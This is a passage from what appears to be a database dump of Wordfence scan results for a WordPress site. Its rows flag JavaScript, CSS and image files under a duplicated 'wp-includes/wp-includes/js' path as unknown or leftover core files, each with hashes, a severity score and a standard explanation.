core: wp-includes/wp-includes/js/json2.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/json2.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27301,1631424917,1631424917,'new','knownfile',75,'986c2780a21993a7edf61f050f6bfff1','d47eb171895f8b5332e930e944177a78','Unknown file in WordPress core: wp-includes/wp-includes/js/masonry.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/masonry.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27302,1631424917,1631424917,'new','knownfile',75,'f26b4f89130b2efc4f7d8525693713d7','1d6818c3cef3e440fa489028d2e49d83','Unknown file in WordPress core: wp-includes/wp-includes/js/mce-view.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/mce-view.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27303,1631424917,1631424917,'new','knownfile',75,'7247338de3f63b2b41b56894914659ea','06a0b72c65242503cc1c1e5e9adffb57','Unknown file in WordPress core: wp-includes/wp-includes/js/mce-view.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/mce-view.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27304,1631424917,1631424917,'new','knownfile',75,'67636eb2c44f019d7a44a9cd36051fc6','74394987136308a558fa341db3b84c07','Unknown file in WordPress core: wp-includes/wp-includes/js/media-audiovideo.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-audiovideo.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27305,1631424917,1631424917,'new','knownfile',75,'cb0c93023f447255c5b55a8b0ad0af1d','4f5bf5c9df6e6b01f54a396b9d68d068','Unknown file in WordPress core: wp-includes/wp-includes/js/media-audiovideo.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/media-audiovideo.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27306,1631424917,1631424917,'new','knownfile',75,'d2eae43143df05ae889b22e8927799cf','1f20ba3d1414b50eed9465afb3caa0f4','Unknown file in WordPress core: wp-includes/wp-includes/js/media-editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/media-editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27307,1631424918,1631424918,'new','knownfile',75,'fd1a119ca4a02bc0911f9e8ead142d40','37531bde7d1065bd91ea58c3a319184d','Unknown file in WordPress core: wp-includes/wp-includes/js/media-editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27308,1631424918,1631424918,'new','knownfile',75,'b2cff32723099ccda1eeada609bae8de','23f9138fa826ce4c6ca63bb9d126fdb2','Unknown file in WordPress core: wp-includes/wp-includes/js/media-grid.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:40:\"wp-includes/wp-includes/js/media-grid.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27309,1631424918,1631424918,'new','knownfile',75,'bce07baae428ee52d6f329aa2cf28acd','675406f131ff47d6e55d51d40125a1cd','Unknown file in WordPress core: wp-includes/wp-includes/js/media-grid.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/media-grid.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27310,1631424918,1631424918,'new','knownfile',75,'e2f5479a1887995d3c6ad09a7db98b74','1bc2ccb153c594fe6280ddaeb977fa7a','Unknown file in WordPress core: wp-includes/wp-includes/js/media-models.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/media-models.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27311,1631424918,1631424918,'new','knownfile',75,'be3ae3cb8a3ace9d1e319f925d7971d8','30c780f683cf961d33bde412255c86f9','Unknown file in WordPress core: wp-includes/wp-includes/js/media-models.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/media-models.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27312,1631424918,1631424918,'new','knownfile',75,'54b1d58e44c165b727876cfd094829e1','c14bbe6e7cd4ceafd79e8f93c09c9f4d','Unknown file in WordPress core: wp-includes/wp-includes/js/media-views.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/media-views.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27313,1631424918,1631424918,'new','knownfile',75,'f3ed63cfac675e609fa09a82eef0faac','5a6f48c29dd1693233e79fcb7a810419','Unknown file in WordPress core: wp-includes/wp-includes/js/media-views.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/media-views.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27314,1631424918,1631424918,'new','knownfile',75,'e90f3a4755a7dbb9508879ee98d17584','5e98185b784f1df386fd37049dac6b5b','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27315,1631424918,1631424918,'new','knownfile',75,'9b93526f46643ffd053a8b3feb7dc7f6','31575184a43959adc21e576b733440cd','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:70:\"wp-includes/wp-includes/js/mediaelement/mediaelement-and-player.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27316,1631424918,1631424918,'new','knownfile',75,'5b42333a75cfd19e71766a64d9c3e3f9','6fd765d422ad77873161e2db1525aee6','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27317,1631424918,1631424918,'new','knownfile',75,'5a72f8e1014104227b8f2ebae3d8a0a4','a5d5f4c90a51a19083415404be3a0f09','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/js/mediaelement/mediaelement-migrate.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27318,1631424918,1631424918,'new','knownfile',75,'d0e23e4ed180138f9957872d42753445','2fe5f2f861770a9c11889c78fe4969d1','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/js/mediaelement/mediaelement.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27319,1631424918,1631424918,'new','knownfile',75,'a366363cecfc6df8fa6fb71395a79669','35e21a275d28760b988bd9b06bb6287d','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelement.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/mediaelement/mediaelement.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27320,1631424918,1631424918,'new','knownfile',75,'8dda0ab0db1e3771eadb5f1a937bd95d','035d6774ab81569269bf82a4ff8a5fab','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27321,1631424919,1631424919,'new','knownfile',75,'9d66fafab96483da117ee59317e803f8','e416d0d508ebb0485ead142e7f2b472e','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27322,1631424919,1631424919,'new','knownfile',75,'f1c2182329f7dccbd40653632b845d9c','1134eb4f1bf20def37ebc84e75ae964a','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27323,1631424919,1631424919,'new','knownfile',75,'31f2a9cd7a6ec279f3445e8bf74392d8','549a92b501573dc01ad7094a1a9413fa','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/js/mediaelement/mediaelementplayer.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27324,1631424919,1631424919,'new','knownfile',75,'6b7ca2f297d31fc7abc622a1fee3b8f0','fe3a53badfa21857d9d99ce71a78bb44','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mejs-controls.png','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/mediaelement/mejs-controls.png\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27325,1631424919,1631424919,'new','knownfile',75,'680dea47556d8b67db0ad3bd79ed6b32','afac53d8ccf83aeff4186dca42b8f776','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/mejs-controls.svg','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/js/mediaelement/mejs-controls.svg\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27326,1631424919,1631424919,'new','knownfile',75,'0cea071d0abf03f9ac8c5f2ab738145c','c7a3291a76d0d84cdca728dc16a01c8c','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/renderers/vimeo.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27327,1631424919,1631424919,'new','knownfile',75,'d49b2d2426a582d75258a3ed3ac05794','c037417ab64a37ad47fd418bf7ddcabb','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/renderers/vimeo.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27328,1631424919,1631424919,'new','knownfile',75,'cb92c7bf6980abc4e11ec719213df427','0034e60d16e44233b712b37865a0de35','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27329,1631424920,1631424920,'new','knownfile',75,'38098a2db6318291df5c759f8e15ed65','7bc0965430ab87f79cdf8f9585353fac','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27330,1631424920,1631424920,'new','knownfile',75,'337b90a994e3b1d6cfb76d3605bef131','3653900454d4a03e8338168a9464f718','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.css\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27331,1631424920,1631424920,'new','knownfile',75,'0c076f597d62d5ef8afce8f6578149b9','31e8953ba0a4d5417be3d09bf08bfea5','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/js/mediaelement/wp-mediaelement.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27332,1631424920,1631424920,'new','knownfile',75,'89f41bd9e30cd991d812ff8f6bccb293','02c4709dd7d719692c3e1f16bf940405','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-playlist.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/mediaelement/wp-playlist.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27333,1631424920,1631424920,'new','knownfile',75,'1c332bfa2970b2c6e4db80e6d4f5cab9','e9f13126afcfd15edc33b9aaeb601d3e','Unknown file in WordPress core: wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/js/mediaelement/wp-playlist.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27334,1631424920,1631424920,'new','knownfile',75,'32e513716150d9f01c42d3ba97d6046d','1c10779a561f95cf591becbf8b9a332f','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/handlers.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/handlers.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27335,1631424923,1631424923,'new','knownfile',75,'ab6dc14c3914c0bde75ca706cb07bb1a','a7cdae0e31ef40b1fead727d0e4d9e0a','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/handlers.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/plupload/handlers.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27336,1631424923,1631424923,'new','knownfile',25,'79e601677db28e9b5d527b445cf28505','6330b5e478c2de5babcf69b0109a212c','Old WordPress core file not removed during update: wp-includes/wp-includes/js/plupload/license.txt','This file is in a WordPress core location but is from an older version of WordPress and not used with your current version. Hosting or permissions issues can cause these files to get left behind when WordPress is updated and they should be removed if possible.','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/license.txt\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27337,1631424923,1631424923,'new','knownfile',75,'0d4d3c5fd03ae0c5bc575dba4b7a2639','8fbfb580fc10e46aea1552f7344c572c','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/moxie.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/plupload/moxie.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27338,1631424923,1631424923,'new','knownfile',75,'843d4cf4df0e5679d2fed43e58a80b9b','d9cc552667c958119248d8cde9435c5d','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/moxie.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/plupload/moxie.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27339,1631424923,1631424923,'new','knownfile',75,'4a677b1bc2949296065a610a7eb5764b','5bbc993176c93348854d7fcfe92bde7f','Unknown file in WordPress core: wp-includes/wp-includes/js/plupload/plupload.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/plupload/plupload.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(27340,1631424924,1631424924,'new','knownfile',75,'28e82bea2a7909152e963d6190cce682','80bc77ef8692cabcda4c9b79ff9a2fb3','Unknown file in 